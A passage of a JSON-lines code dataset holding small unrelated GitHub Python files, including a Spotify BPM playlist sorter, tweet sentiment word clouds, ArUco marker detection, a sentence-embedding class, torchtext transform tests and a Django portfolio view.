","repo_name":"xinshuoLei/Goodreads-Scrapper","sub_path":"query_parser.py","file_name":"query_parser.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"16507680942","text":"import time\nfrom math import ceil\nimport json\nimport os, traceback\nimport sys\nimport spotipy\nfrom dotenv import load_dotenv\nload_dotenv()\n\nCACHE_FILE = \"./bpm-checker.json\"\n\n# Calculates the bpm of a song (roughly) by \n# summing up the counts between a certain amount of taps. 
\ndef determine_bpm(requested_bpm_accuracy = 8):\n\n print(\"\\nTap {} times to the beat using enter key.\\\n \\nIf you made a mistake, type rs and then enter. \\\n \\nTo remove the song, press d and enter.\".format(\n requested_bpm_accuracy))\n\n i = total_time = 0\n while i is not requested_bpm_accuracy:\n user_input = input(\"Press enter on the beat: \")\n if i > 0:\n total_time += time.time() - start_time\n if user_input == \"rs\":\n print(\"Resetting count of this number, start again now.\")\n i = total_time = start_time = 0\n continue\n total_time += time.time() - start_time\n if user_input == \"d\":\n return {\"bpm\": 9999, \"status\": \"DELETE\"}\n start_time = time.time()\n i += 1\n\n total_time += time.time() - start_time\n bpm = ceil(60 * (requested_bpm_accuracy-1) / total_time)\n return {\"bpm\": bpm, \"status\": \"OK\"}\n\n# Function that's for getting a dictionary of all user playlists. \ndef get_user_playlists(sp):\n items = []\n finished = False\n offset = 0\n\n user_name = sp.current_user()['display_name']\n while not finished:\n\n # Get playlists that the user can modify.\n current_results = sp.current_user_playlists(\n limit=50, \n offset=offset)\n items += [\n { \"id\": playlist['id'], \n \"name\": playlist['name'], \n \"snapshot_id\": playlist['snapshot_id'] } \n for playlist in current_results['items']\n if (\n playlist['owner']['display_name'] == user_name \n or playlist['collaborative']) ]\n\n # Make sure we're looping until we've got everything.\n if (offset + 50) >= current_results['total']:\n finished = True\n else:\n offset += 50\n return items\n\n# Opens cache from local storage file.\ndef open_bpm_cache():\n if os.path.exists(CACHE_FILE):\n with open(CACHE_FILE, \"r\") as json_file:\n track_file = json.load(json_file)\n if not track_file: return {}\n return {\n track_id:track_file[track_id] \n for track_id in track_file \n if 'bpm' in track_file[track_id] }\n else:\n return {}\n\n# Function that let's the user choose a playlist from their playlists. \ndef select_playlist(sp):\n playlists = get_user_playlists(sp)\n\n print(\"\\nYour playlists: \")\n for index in range(len(playlists)):\n print(\"{index: <4} {name}\".format(\n index=index, \n name=playlists[index]['name']))\n\n is_selected = False\n while not is_selected:\n selected = int(input(\"\\nEnter playlist number number: \".strip()) or -1)\n if 0 <= selected < len(playlists): \n is_selected = input(\n \"You are sorting list '{}', type 'y' if you want to continue.\".format(\n playlists[selected]['name'])).lower() == \"y\"\n\n return playlists[selected]\n\n\n# Function that's for getting a dictionary of all user playlists. 
\ndef get_playlist_tracks(sp, playlist_id):\n tracks = []\n offset = 0\n track_position = 0\n while True:\n\n # Get user's playlists.\n results = sp.playlist_tracks(\n playlist_id=playlist_id, \n fields=\"total,items(track(id,uri,name,artists(name)))\", \n limit=50, \n offset=offset)\n\n for track in [item['track'] for item in results['items']]:\n track['track_position'] = track_position\n track['artists'] = [artist['name'] for artist in track['artists']]\n track_position += 1\n tracks.append(track)\n\n # Make sure we're looping until we've got everything.\n if (offset + 50) > results['total']:\n return tracks\n else:\n offset += 50\n \n\n# Selects the user device based on choice.\ndef select_user_device(sp):\n devices = sp.devices()['devices']\n\n print(\"Your devices: \")\n for index in range(len(devices)):\n print(\"{index: <3} {name}\".format(\n index=index, \n name=devices[index]['name']))\n\n while True:\n device_index = int(\n input(\"Select a device on which to play ({}): \"\n .format(devices[0]['name'])).strip() \n or 0)\n if 0 <= device_index < len(devices): return devices[device_index]['id']\n\n# Asks the user if automated music should be played.\ndef ask_automated_music():\n while True:\n answer = input(\"\\nAutoplay the analysed music? Y/n: \").lower()\n if answer == \"\": answer = \"y\"\n if answer in [\"y\", \"n\"]: break;\n return answer == \"y\"\n\n# Asks user for required operation per track.\nSKIP_TRACK = 0\nREPLACE_TRACK = 1\nAVERAGE_TRACK = 2\ndef ask_track_operation():\n print(\"\\nIf the bpm is already known, what do you want to do?\")\n print(\"{}) Use the known bpm and skip the song\".format(SKIP_TRACK))\n print(\"{}) Replace the previously noted bpm\".format(REPLACE_TRACK))\n print(\"{}) Average with the previously noted bpm\".format(AVERAGE_TRACK))\n while True:\n answer = int(input(\"Answer (0): \") or 0)\n if 0 <= answer <= 2: return answer\n\n# Uses spotipy's function to set the right order in a playlist.\ndef sort_playlist_based_on_tracks(sp, user_id, playlist, tracks = []):\n\n track_ids = [track['id'] for track in tracks]\n\n for offset in range(ceil(len(track_ids)/100)):\n sp.user_playlist_remove_all_occurrences_of_tracks(\n user=user_id, \n playlist_id=playlist['id'], \n tracks=track_ids[offset*100:offset*100+100], \n snapshot_id=playlist['snapshot_id'])\n \n for offset in range(ceil(len(track_ids)/100)):\n sp.user_playlist_add_tracks(\n user=user_id, \n playlist_id=playlist['id'], \n tracks=track_ids[offset*100:offset*100+100])\n\n # Sorting algorithm that would have worked if I had more time ...\n # for i in range(len(tracks)-1, -1, -1):\n # print(\"moving {name} from pos {old} to pos {new}.\".format(name=tracks[i]['name'], old=tracks[i]['track_position'], new=i))\n # sp.user_playlist_reorder_tracks(user_id, playlist['id'], snapshot_id=playlist['snapshot_id'], range_start=tracks[i]['track_position'], insert_before=i)\n # if i % 5 == 0:\n # print(\"Giving spotify a rest...\")\n # time.sleep(5)\n print(\"Sorting 100% done!\")\n\n\n# =========================== Non Function Code ============================ #\n\n# Setting up the Spotify-client using online authentication. We require a lot of credentials. :')\nprint(\"Hi! 
We're going to log you in now.\")\ntime.sleep(2)\ntoken = spotipy.util.prompt_for_user_token(\n \"\",\n 'playlist-read-collaborative user-read-playback-state \\\n playlist-modify-public playlist-read-private \\\n playlist-modify-private streaming \\\n user-modify-playback-state',\n client_id=os.getenv('CLIENT_ID'), \n client_secret=os.getenv('CLIENT_SECRET'),\n redirect_uri='http://localhost:5710/callback/')\nif not token:\n print(\"Something went wrong while logging in.\")\n quit()\nsp = spotipy.Spotify(auth=token)\n\n# Make user select a playlist to analyse and get the tracks.\nplaylist = select_playlist(sp)\nuser_id = sp.current_user()['id']\ntracks = get_playlist_tracks(sp, playlist_id = playlist['id'])\n\n# Ask for the amount of taps for determining bpm.\nprint(\"Be aware that this tool will reset added-by-date in your spotify list.\")\ntaps = int(input(\"Taps to enter per song (8): \") or 8)\n\n# Ask for headstart in spotify songs.\nstandard_skip = int(input(\"Seconds headstart in songs (30): \") or 30)*1000\n\n# Ask track operation, averaging, replacing or skipping (if known).\ntrack_operation = ask_track_operation()\n\n# Ask if script should start automated music. \nautomated_music = ask_automated_music()\nif automated_music: device_id = select_user_device(sp)\n\n# Open bpm database (local cache).\nbpm_database = open_bpm_cache()\n\n# Start analysing the songs. \n# This is in a try_catch loop, so we don't lose analysed songs.\nprint(\"\\nWe're starting the sorting of songs now.\")\n# try: \nif True:\n \n # Loop over the index of all tracks in the playlist. \n # We delete elements from spotify, the index has to shift back.\n deleted_tracks = 0\n for track_index in range(len(tracks)):\n track_index -= deleted_tracks\n # Get current track based on index, get the known bpm if it exists.\n track = tracks[track_index]\n track_bpm_known = (\n bpm_database and track['id'] in bpm_database\n and 'bpm' in bpm_database[track['id']])\n\n # Skip if we have the track information and operation is to skip it\n if track_bpm_known and track_operation == SKIP_TRACK:\n tracks[track_index]['bpm'] = bpm_database[track['id']]['bpm']\n continue\n\n # Sleep a bit to give the user a bit of rest.\n time.sleep(0.5)\n print(\"{cur}/{total} Analysing {name} by {artist}\".format(\n cur=track_index, \n total=len(tracks), \n name=track['name'], \n artist=\", \".join(track['artists'])))\n \n # Play music if user requested it.\n if automated_music: \n sp.start_playback(device_id=device_id, uris=[track['uri']])\n sp.seek_track(position_ms=standard_skip, device_id=device_id)\n\n # Determining the bpm\n bpm_result = determine_bpm(taps)\n bpm = bpm_result['bpm']\n if bpm_result['status'] == \"DELETE\":\n deleted_tracks += 1\n sp.user_playlist_remove_specific_occurrences_of_tracks(\n user=user_id, \n playlist_id=playlist['id'], \n tracks=[{\n \"uri\": tracks[track_index]['uri'], \n \"positions\": [track_index]}])\n print(\"Track deleted. 
\\n\")\n del tracks[track_index]\n continue\n \n print(\"You determined this song on {} bpm.\".format(bpm))\n\n # Averaging this bpm with the one already noted.\n if track_bpm_known and track_operation == AVERAGE_TRACK:\n old_bpm = bpm_database[track['id']]\n bpm = (bpm+old_bpm) / 2\n print(\"Noted bpm was {}, wrote down {} bpm as average.\"\n .format(old_bpm, bpm))\n\n # Pause playback, note bpm and continue loop.\n print(\"\")\n sp.pause_playback(device_id=device_id)\n tracks[track_index]['bpm'] = bpm\n bpm_database[track['id']] = tracks[track_index]\n\n # Sort the playlist and submit it to Spotify.\n tracks.sort(key=lambda track: track['bpm'] if 'bpm' in track else 9999)\n sort_playlist_based_on_tracks(\n sp, \n user_id=user_id, \n playlist=playlist, \n tracks=tracks)\n\n# Catch exceptions.\n# except BaseException as e: \n# print(str(e))\n# print(\"Something went wrong while analysing.\")\n# print(\"Songs until now have been saved. Nothing is sorted.\")\n\n# Write the user's work to the disk.\n\nwith open(CACHE_FILE, \"w\") as json_file:\n json_file.write(json.dumps(bpm_database))\n\n# We're done here folks!\nprint(\"===== All {} tracks finished processing! ====\".format(len(tracks)))","repo_name":"idegeus/spotify-bpm-sorter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73317422506","text":"import re\nimport pandas as pd\nfrom wordcloud import WordCloud\nfrom matplotlib import pyplot as plt\nfrom nltk.corpus import stopwords\nfrom nltk import word_tokenize, WordNetLemmatizer, FreqDist\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\ntweets = pd.read_csv(\"tweets/dreamworks.csv\")\n\ndreamworks_content_array = pd.DataFrame(tweets, columns=['content']).to_numpy().flatten()\n\nsid = SentimentIntensityAnalyzer()\nlem = WordNetLemmatizer()\nstop_words = stopwords.words(\"english\")\nstop_words.extend(['dreamworks', 'im', 'show', 'people', 'dont', 'didnt', 'movie', 'disney', 'disneys', 'one', 'lol',\n 'know', 'cant', 'get', 'got', 'make', 'made', 'think', 'going', 'also', 'would', 'film', 'guy', '2',\n 'thing', 'go', 'see', 'say', 'said', 'thats', 'youre', 'theyre', 'us', 'animation', 'movies'])\n\nneg = []\npos = []\nneu = []\nfor i in dreamworks_content_array:\n if sid.polarity_scores(i)[\"compound\"] > 0:\n pos.append(i)\n elif sid.polarity_scores(i)[\"compound\"] == 0:\n neu.append(i)\n else:\n neg.append(i)\n\nprint(\"neg: \", len(neg))\nprint(\"neu: \", len(neu))\nprint(\"pos: \", len(pos))\n\nneg = \" \".join(neg).lower()\nneg = re.sub(r'[^a-zA-Z0-9 ]', '', neg)\ndreamworks_tokenized = word_tokenize(neg)\n\ndreamworks_filtered = []\nfor w in dreamworks_tokenized:\n if w not in stop_words:\n dreamworks_filtered.append(w)\n\ndreamworks_lem = []\nfor w in dreamworks_filtered:\n dreamworks_lem.append(lem.lemmatize(w))\n\nfdist = FreqDist(dreamworks_lem).most_common(10)\nwords = []\nfrequency = []\nfor i in fdist:\n words.append(i[0])\n frequency.append(i[1])\nwords.reverse()\nfrequency.reverse()\n\nplt.barh(words, frequency)\nplt.savefig(\"charts/DreamworksNegBarPlot\")\nplt.show()\n\nwordcloud = WordCloud(stopwords=stop_words, max_words=30, background_color=\"white\").generate(neg)\n\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\nwordcloud.to_file(\"charts/DreamworksNegWordCloud.png\")\n\npos = \" \".join(pos).lower()\npos = re.sub(r'[^a-zA-Z0-9 ]', '', pos)\ndreamworks_tokenized = 
word_tokenize(pos)\n\ndreamworks_filtered = []\nfor w in dreamworks_tokenized:\n if w not in stop_words:\n dreamworks_filtered.append(w)\n\ndreamworks_lem = []\nfor w in dreamworks_filtered:\n dreamworks_lem.append(lem.lemmatize(w))\n\nfdist = FreqDist(dreamworks_lem).most_common(10)\nwords = []\nfrequency = []\nfor i in fdist:\n words.append(i[0])\n frequency.append(i[1])\nwords.reverse()\nfrequency.reverse()\n\nplt.barh(words, frequency)\nplt.savefig(\"charts/DreamworksPosBarPlot\")\nplt.show()\n\nwordcloud = WordCloud(stopwords=stop_words, max_words=30, background_color=\"white\").generate(pos)\n\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\nwordcloud.to_file(\"charts/DreamworksPosWordCloud.png\")\n\n\nneu = \" \".join(neu).lower()\nneu = re.sub(r'[^a-zA-Z0-9 ]', '', neu)\ndreamworks_tokenized = word_tokenize(neu)\n\ndreamworks_filtered = []\nfor w in dreamworks_tokenized:\n if w not in stop_words:\n dreamworks_filtered.append(w)\n\ndreamworks_lem = []\nfor w in dreamworks_filtered:\n dreamworks_lem.append(lem.lemmatize(w))\n\nfdist = FreqDist(dreamworks_lem).most_common(10)\nwords = []\nfrequency = []\nfor i in fdist:\n words.append(i[0])\n frequency.append(i[1])\nwords.reverse()\nfrequency.reverse()\n\nplt.barh(words, frequency)\nplt.savefig(\"charts/DreamworksNeuBarPlot\")\nplt.show()\n\nwordcloud = WordCloud(stopwords=stop_words, max_words=30, background_color=\"white\").generate(neu)\n\nplt.imshow(wordcloud, interpolation='bilinear')\nplt.axis(\"off\")\nplt.show()\nwordcloud.to_file(\"charts/DreamworksNeuWordCloud.png\")\n","repo_name":"tusiaa/INF_Sandra_Leman_275033","sub_path":"Projekt2/DreamworksSentiment.py","file_name":"DreamworksSentiment.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22161025125","text":"import numpy as np\nimport cv2\n\naruco = cv2.aruco\np_dict = aruco.getPredefinedDictionary(aruco.DICT_4X4_50)\n\nimg_bgr = cv2.imread(\"png/printed_ARmarker_with_coin3.jpg\")\npShape = tuple( img_bgr.shape[0:2] )\nprint( pShape )\nimg_gry = cv2.cvtColor ( img_bgr, cv2.COLOR_BGR2GRAY )\ncorners, ids, rejectedImgPoints = aruco.detectMarkers(img_bgr, p_dict) # 検出\n\n# 時計回りで左上から順にマーカーの「中心座標」を m に格納\nm = np.empty((4,2))\nfor i,c in zip( ids.ravel(), corners ):\n m[i] = c[0].mean(axis=0)\n\npRatio = float(pShape[1]) / float(pShape[0])\nwidth, height = ( 500, int(500*pRatio), ) # 変形後画像サイズ\n\nmarker_coordinates = np.float32( m )\nprint( marker_coordinates.shape )\nprint( marker_coordinates )\n\ntrans = False\nif ( trans ):\n true_coordinates = np.float32([[0,0],[width,0],[0,height],[width,height],] )\n trans_mat = cv2.getPerspectiveTransform(marker_coordinates,true_coordinates )\n img_out = cv2.warpPerspective( img_bgr, trans_mat, (width, height) )\nelse:\n img_out = img_bgr\n \ncv2.imwrite( \"png/out3.png\", img_out )\n\n\n\n\n","repo_name":"wfw-pgr/opencv2","sub_path":"test__ARmarker_by_ArUco/pyt/sample3.py","file_name":"sample3.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29425808667","text":"from typing import Tuple, List, Union\nimport torch\nimport numpy as np\nfrom transformers import AutoModel, AutoTokenizer\n\n\nclass HuggingfaceEmbeddings:\n \"\"\"A simple class to handle the sentence transformation using the specified model.\n\n Attributes:\n device (torch.device): The device used for computations, i.e., either a GPU (if 
available) or a CPU.\n tokenizer (transformers.AutoTokenizer): The tokenizer associated with the model.\n model (transformers.AutoModel): The transformer model used for sentence embeddings.\n \"\"\"\n\n def __init__(\n self,\n model: str = \"sentence-transformers/all-mpnet-base-v2\",\n ):\n \"\"\"Constructor method\n\n Args:\n model (str): The name of the model to be loaded. By default, it uses the all-mpnet-base-v2 model.\n \"\"\"\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.tokenizer = AutoTokenizer.from_pretrained(model)\n self.model = AutoModel.from_pretrained(model).to(self.device)\n\n def mean_pooling(\n self, model_output: Tuple[torch.Tensor], attention_mask: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"Apply mean pooling on the model outputs.\n\n Args:\n model_output (torch.Tensor): The model's output.\n attention_mask (torch.Tensor): The attention mask tensor.\n\n Return:\n torch.Tensor: The mean pooled output tensor.\n \"\"\"\n token_embeddings = model_output[\n 0\n ] # First element of model_output contains all token embeddings\n input_mask_expanded = (\n attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()\n )\n return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(\n input_mask_expanded.sum(1), min=1e-9\n )\n\n def get_embedding(\n self,\n sentences: Union[str, List[str]],\n convert_to_tensor: bool = False,\n max_length: int = 128,\n ) -> Union[torch.Tensor, np.ndarray]:\n \"\"\"Encode sentences into sentence embeddings.\n\n Args:\n sentences (str | list): The sentences to be encoded. Can be either a single string or a list of strings.\n convert_to_tensor (bool, optional): If set to True, the method will return tensors, otherwise it will return numpy arrays. Defaults to False.\n max_length (int, optional): The maximum length for the sentences. Any sentence exceeding this length gets truncated. Defaults to 128.\n\n Returns:\n torch.Tensor | numpy.ndarray: The sentence embeddings. The datatype depends on the 'convert_to_tensor' parameter.\n \"\"\"\n # Ensure sentences is a list\n if not isinstance(sentences, list):\n sentences = [sentences]\n\n # Tokenize the sentences\n encoded_input = self.tokenizer(\n sentences,\n padding=\"max_length\",\n truncation=True,\n max_length=max_length,\n return_tensors=\"pt\",\n ).to(self.device)\n\n # Get the model's output\n with torch.no_grad():\n model_output = self.model(**encoded_input)\n\n # Perform pooling. In this case, mean pooling.\n sentence_embeddings = self.mean_pooling(\n model_output, encoded_input[\"attention_mask\"]\n )\n\n if convert_to_tensor:\n return sentence_embeddings\n else:\n return sentence_embeddings.cpu().numpy()\n","repo_name":"JohnSnowLabs/langtest","sub_path":"langtest/embeddings/huggingface.py","file_name":"huggingface.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":362,"dataset":"github-code","pt":"37"}
{"seq_id":"40432780250","text":"def check(guess, answer): \r\n global score \r\n still_guessing = True \r\n attempt = 0 \r\n while still_guessing and attempt < 3: \r\n if guess.lower() == answer.lower(): \r\n print(\"Correct Answer !!!\") \r\n score = score + 1 \r\n still_guessing = False \r\n \r\n else: \r\n if attempt < 2: \r\n guess = input(\"Sorry Wrong Answer, try again!\") \r\n attempt = attempt + 1 \r\n if attempt == 3: \r\n print(\"The Correct answer is \",answer ) \r\nscore = 0\r\nprint(\"Guess the Animal\")\r\nguess1 = input(\"Which animal has 3 hearts? \")\r\ncheck(guess1, \"octopus\")\r\nguess2 = input(\"Which animal has blue blood? \")\r\ncheck(guess2, \"spider\")\r\nguess3 = input(\"Which is the second smartest animal on earth after human? \")\r\ncheck(guess3, \"dolphin\")\r\nprint(\"Your Score is \"+ str(score))\r\n","repo_name":"Sonu-Dutta/Python-Assignment","sub_path":"P7_quizGame.py","file_name":"P7_quizGame.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"33503009383","text":"from peewee import *\nimport random, datetime\n\nsqlite_db = SqliteDatabase('pengguna.db')\n\nclass Pengguna(Model):\n username = CharField()\n point = IntegerField()\n join_at = DateTimeField(default=datetime.datetime.now)\n\n class Meta:\n database = sqlite_db\n\nsqlite_db.connect()\nsqlite_db.create_tables([Pengguna], safe=True)\n\n#hitung jumlah data\n#print(Pengguna.select().count())\n\nusers = Pengguna.select().paginate(2,2)\n\nfor user in users:\n print(user.username)\n\n#users = Pengguna.select().order_by(Pengguna.point.desc())\n\n#for user in users:\n# print(user.username) + ' ' + str(user.point)\n\"\"\"\nuser = Pengguna.select().where(Pengguna.username == 'yudhi').get()\nuser.username = 'yudhirangga'\nuser.save()\n\nuser.update(point = 100).where(Pengguna.username == 'rangga').execute()\n\"\"\"\n\n'''\ndef get_rand():\n return random.randint(1,100)\n\ndata = [\n {'username': 'yudhi', 'point': get_rand()},\n {'username': 'rangga', 'point': get_rand()},\n {'username': 'boy', 'point': get_rand()},\n {'username': 'masta', 'point': get_rand()}\n]\n\nPengguna.insert_many(data).execute()\n'''","repo_name":"Yudhi151811513042/database_di_python_peewee","sub_path":"sorting data asc dan desc/pengguna.py","file_name":"pengguna.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"43749135933","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nИзучаем множества, выясняем состав гласных в слове при\nпомощи множеств\n\"\"\"\nword = input('Введите слово латиницей >')\nvowels = set('aouei') # создаем множество\ni = vowels.intersection(set(word)) # ищем общие гласные в двух множествах\nfor letter in i:\n print(letter)\n","repo_name":"cherrydan/python-for-work","sub_path":"Vowels/vowels7.py","file_name":"vowels7.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"34661027418","text":"from bs4 import BeautifulSoup\nimport requests\n\nr = requests.get('https://lpse.jakarta.go.id/eproc4/home')\ndata = r.text\nsoup = BeautifulSoup(data, \"html.parser\")\n\n#return author name\nfor tabel in soup.findAll('tblStatusLelang'):\n print (tabel.get)\n\n","repo_name":"davidsugianto/developer-Test","sub_path":"Scraping/scrapLPSE.py","file_name":"scrapLPSE.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"40253685531","text":"class WeightedQuickUnion(object):\n def __init__(self, n):\n self.n = n\n self.ids = list(range(n))\n self.sz = [1 for i in range(n)]\n\n def root(self, i):\n while i != self.ids[i]:\n self.ids[i] = self.ids[self.ids[i]]\n i = self.ids[i]\n return i\n\n def connected(self, p, q):\n return self.root(p) == self.root(q)\n\n def union(self, p, q):\n if not self.connected(p, q):\n i = self.root(p)\n j = self.root(q)\n if self.sz[i] < 
self.sz[j]:\n self.ids[i] = j\n self.sz[j] += self.sz[i]\n else:\n self.ids[j] = i\n self.sz[i] += self.sz[j]\n print(list(range(self.n)))\n print(self.ids)\n print(self.sz)\n","repo_name":"tatterdemalion/playground","sub_path":"algorithms/weighted_quick_union.py","file_name":"weighted_quick_union.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31593862674","text":"import torch\nfrom torchtext import transforms\nfrom torchtext.vocab import vocab\nfrom collections import OrderedDict\n\nfrom .common.torchtext_test_case import TorchtextTestCase\nfrom .common.assets import get_asset_path\n\n\nclass TestTransforms(TorchtextTestCase):\n def _spmtokenizer(self, test_scripting):\n asset_name = \"spm_example.model\"\n asset_path = get_asset_path(asset_name)\n transform = transforms.SentencePieceTokenizer(asset_path)\n if test_scripting:\n transform = torch.jit.script(transform)\n\n actual = transform([\"Hello World!, how are you?\"])\n expected = [['▁Hello', '▁World', '!', ',', '▁how', '▁are', '▁you', '?']]\n self.assertEqual(actual, expected)\n\n actual = transform(\"Hello World!, how are you?\")\n expected = ['▁Hello', '▁World', '!', ',', '▁how', '▁are', '▁you', '?']\n self.assertEqual(actual, expected)\n\n def test_spmtokenizer(self):\n \"\"\"test tokenization on single sentence input as well as batch on sentences\"\"\"\n self._spmtokenizer(test_scripting=False)\n\n def test_spmtokenizer_jit(self):\n \"\"\"test tokenization with scripting on single sentence input as well as batch on sentences\"\"\"\n self._spmtokenizer(test_scripting=True)\n\n def _vocab_transform(self, test_scripting):\n vocab_obj = vocab(OrderedDict([('a', 1), ('b', 1), ('c', 1)]))\n transform = transforms.VocabTransform(vocab_obj)\n if test_scripting:\n transform = torch.jit.script(transform)\n actual = transform([['a', 'b', 'c']])\n expected = [[0, 1, 2]]\n self.assertEqual(actual, expected)\n\n actual = transform(['a', 'b', 'c'])\n expected = [0, 1, 2]\n self.assertEqual(actual, expected)\n\n def test_vocab_transform(self):\n \"\"\"test token to indices on both sequence of input tokens as well as batch of sequence\"\"\"\n self._vocab_transform(test_scripting=False)\n\n def test_vocab_transform_jit(self):\n \"\"\"test token to indices with scripting on both sequence of input tokens as well as batch of sequence\"\"\"\n self._vocab_transform(test_scripting=True)\n\n def _totensor(self, test_scripting):\n padding_value = 0\n transform = transforms.ToTensor(padding_value=padding_value)\n if test_scripting:\n transform = torch.jit.script(transform)\n input = [[1, 2], [1, 2, 3]]\n\n actual = transform(input)\n expected = torch.tensor([[1, 2, 0], [1, 2, 3]], dtype=torch.long)\n torch.testing.assert_close(actual, expected)\n\n input = [1, 2]\n actual = transform(input)\n expected = torch.tensor([1, 2], dtype=torch.long)\n torch.testing.assert_close(actual, expected)\n\n def test_totensor(self):\n \"\"\"test tensorization on both single sequence and batch of sequence\"\"\"\n self._totensor(test_scripting=False)\n\n def test_totensor_jit(self):\n \"\"\"test tensorization with scripting on both single sequence and batch of sequence\"\"\"\n self._totensor(test_scripting=True)\n\n def _labeltoindex(self, test_scripting):\n label_names = ['test', 'label', 'indices']\n transform = transforms.LabelToIndex(label_names=label_names)\n if test_scripting:\n transform = torch.jit.script(transform)\n actual = transform(label_names)\n expected 
= [0, 1, 2]\n self.assertEqual(actual, expected)\n\n with self.assertRaises(RuntimeError):\n transform(['OOV'])\n\n transform = transforms.LabelToIndex(label_names=label_names, sort_names=True)\n if test_scripting:\n transform = torch.jit.script(transform)\n actual = transform(label_names)\n expected = [2, 1, 0]\n self.assertEqual(actual, expected)\n\n actual = transform(\"indices\")\n expected = 0\n self.assertEqual(actual, expected)\n\n asset_name = \"label_names.txt\"\n asset_path = get_asset_path(asset_name)\n transform = transforms.LabelToIndex(label_path=asset_path)\n if test_scripting:\n transform = torch.jit.script(transform)\n actual = transform(label_names)\n expected = [0, 1, 2]\n self.assertEqual(actual, expected)\n\n def test_labeltoindex(self):\n \"\"\"test labe to ids on single label input as well as batch of labels\"\"\"\n self._labeltoindex(test_scripting=False)\n\n def test_labeltoindex_jit(self):\n \"\"\"test labe to ids with scripting on single label input as well as batch of labels\"\"\"\n self._labeltoindex(test_scripting=True)\n\n def _truncate(self, test_scripting):\n max_seq_len = 2\n transform = transforms.Truncate(max_seq_len=max_seq_len)\n if test_scripting:\n transform = torch.jit.script(transform)\n\n input = [[1, 2], [1, 2, 3]]\n actual = transform(input)\n expected = [[1, 2], [1, 2]]\n self.assertEqual(actual, expected)\n\n input = [1, 2, 3]\n actual = transform(input)\n expected = [1, 2]\n self.assertEqual(actual, expected)\n\n input = [[\"a\", \"b\"], [\"a\", \"b\", \"c\"]]\n actual = transform(input)\n expected = [[\"a\", \"b\"], [\"a\", \"b\"]]\n self.assertEqual(actual, expected)\n\n input = [\"a\", \"b\", \"c\"]\n actual = transform(input)\n expected = [\"a\", \"b\"]\n self.assertEqual(actual, expected)\n\n def test_truncate(self):\n \"\"\"test truncation on both sequence and batch of sequence with both str and int types\"\"\"\n self._truncate(test_scripting=False)\n\n def test_truncate_jit(self):\n \"\"\"test truncation with scripting on both sequence and batch of sequence with both str and int types\"\"\"\n self._truncate(test_scripting=True)\n","repo_name":"cuikunyu/text","sub_path":"test/test_transforms.py","file_name":"test_transforms.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"37648891184","text":"# MICROSOFT\n\"\"\"\n SOLVED -- LEETCODE#941\n Given an array of heights,\n determine whether the array forms a \"mountain\" pattern.\n A mountain pattern goes up and then down.\n Like\n /\\\n / \\\n / \\\n\"\"\"\n\n\nclass Solution(object):\n def validMountainArray(self, arr):\n # Time: O(n) Space: O(1)\n n = len(arr)\n if n < 3:\n return False\n mxfound = False\n\n for i in range(1, n):\n if mxfound:\n if arr[i] >= arr[i - 1]:\n return False\n else:\n if arr[i] <= arr[i - 1]:\n return False\n elif i + 1 < n and arr[i] > arr[i + 1]:\n mxfound = True\n\n return mxfound\n\n\nprint(Solution().validMountainArray([1, 2, 3, 2, 1]))\n# True\n\nprint(Solution().validMountainArray([1, 2, 3]))\n# False\n","repo_name":"SuchismitaDhal/Solutions-dailyInterviewPro","sub_path":"2020/07-July/07.06.py","file_name":"07.06.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4025830674","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import redirect\nfrom django.template import loader\nfrom .models import Content, SubWork, Work\nfrom 
.Form.contactForm import ContactForm\n# Create your views here.\n\n\ndef Index(request):\n about_sites = Content.objects.filter(contents_type=\"SITE\").first()\n about_me = Content.objects.filter(contents_type=\"PROFILE\").first()\n skills = Content.objects.filter(contents_type=\"SKILLS\").first()\n skill_db = skills.related_content.filter(type=\"DB\").order_by(\"name\")\n skill_language = skills.related_content.filter(type=\"Language\").order_by(\"name\")\n skill_framework = skills.related_content.filter(type=\"Framework\").order_by(\"name\")\n works = Content.objects.filter(contents_type=\"WORKS\").first()\n work_contents = works.work_content.all()\n template = loader.get_template('myprofile/index.html')\n\n # 問い合わせフォーム\n contact_form = ContactForm()\n isSuccess = False\n if request.method == \"POST\":\n contact_form = RegisterContact(request)\n\n # 水玉用\n for_range_li = [i for i in range(15)]\n\n # テーブルのレイアウトをそろえる用の変数\n skill_max_count = max([len(skill_db), len(skill_language), len(skill_framework)])\n for_range_skill_db = [i for i in range(skill_max_count - len(skill_db))]\n for_range_skill_language = [i for i in 